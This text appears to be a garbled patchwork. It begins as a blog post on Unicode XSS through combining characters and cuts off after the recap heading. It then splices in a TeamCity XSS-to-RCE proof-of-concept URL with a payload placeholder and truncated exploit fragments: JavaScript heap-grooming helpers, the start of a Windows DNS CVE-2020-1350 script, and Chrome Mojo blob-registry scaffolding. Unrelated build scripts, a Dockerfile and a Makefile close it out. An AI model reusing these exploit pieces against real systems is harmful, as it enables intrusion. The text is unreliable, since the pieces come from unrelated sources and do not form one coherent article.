Brendon Tiszka blendin

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

CVE-2019-15848: TeamCity XSS to Remote Code Execution

This POC demonstrates taking advantage of a XSS vulnerability in TeamCity allowing an attacker to achieve Remote Code Execution on a build agent if the victim has the ability to add steps to a CI job.

POC

The POC can be simplified to the following URL:

https://[domain.com]/project.html?projectId=[target_project_id]&amp;tab=problems%27%7D)%3B%7D)()%3B[JS_PAYLOAD]

	function sleep( sleepDuration ){
	var now = new Date().getTime();
	while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
	}
	function gc() {
	for (let i = 0; i < 0x10; i++) {
	new ArrayBuffer(0x1000000);
	}
	}
	let data_view = new DataView(new ArrayBuffer(8));

	#!/usr/bin/env python3

	"""cve-2020-1350.py: Windows DNS Server Vulnerability"""

	__author__ = "@joaovarelas"
	__date__ = "July, 2020"

	import binascii,socket,struct

	from dnslib import *

	<script id="worker1">
	worker:{
	if (typeof window === 'object') break worker;
	self.onmessage = function() {
	console.log("onmessage")
	}
	}
	</script>
	<script src="../mojo_bindings.js"></script>
	<script src="../third_party/blink/public/mojom/tstorage/tstorage.mojom.js"></script>

	<html>
	<body></body>
	<script src="../mojo/public/js/mojo_bindings.js"></script>
	<script src="../third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
	<script src="../third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
	<script>
	var heap;
	var replace_data;
	var count = 0;
	var blob_registry_ptr = new blink.mojom.BlobRegistryPtr();

	#!/bin/bash -i
	#using shebang with -i to enable interactive mode (auto load .bashrc)

	set -e #stop immediately if any error happens

	# Install Open SDK
	apt update
	apt install openjdk-8-jdk -y
	update-java-alternatives --set java-1.8.0-openjdk-amd64
	java -version

	FROM ubuntu:18.04

	RUN apt-get update\
	&& apt-get install -y wget xz-utils build-essential curl git subversion make g++ python chrpath libicu-dev lsb-release \
	&& apt-get clean\
	&& rm -rf /var/lib/apt/lists/* \
	&& curl -SL http://releases.llvm.org/7.0.1/clang+llvm-7.0.1-x86_64-linux-gnu-ubuntu-18.04.tar.xz \| tar -xJC . \
	&& mv clang+llvm-7.0.1-x86_64-linux-gnu-ubuntu-18.04 /usr/share/clang_7.0.1 \
	&& echo 'export PATH="/usr/share/clang_7.0.1/bin:$PATH"' >> ~/.bashrc \
	&& echo 'export LD_LIBRARY_PATH="/usr/share/clang_7.0.1/lib:LD_LIBRARY_PATH"' >> ~/.bashrc\

	all: test preload.so

	clean:
	-$(RM) test preload.so

	%.so: %.c
	$(CC) $^ -o $@ -shared -fPIC $(CFLAGS)

	#!/bin/bash
	# Purpose: Script for building AOSP code and Linux kernel for walleye using open-source toolchains.
	# Author: atulp@google.com
	# License: Gnu GPL v. 2
	# License is same as Linux kernel license, since the code helps compile the Linux kernel for a device
	# Change these directory paths to point to your aosp and NDK folders.
	export AOSP=~/src/aosp
	export CROSS_COMPILE=~/ndk/android-ndk-r16b/toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-
	# Change these if you are building for something other than walleye (Pixel 2) as needed.
	export KERNELNAME=wahoo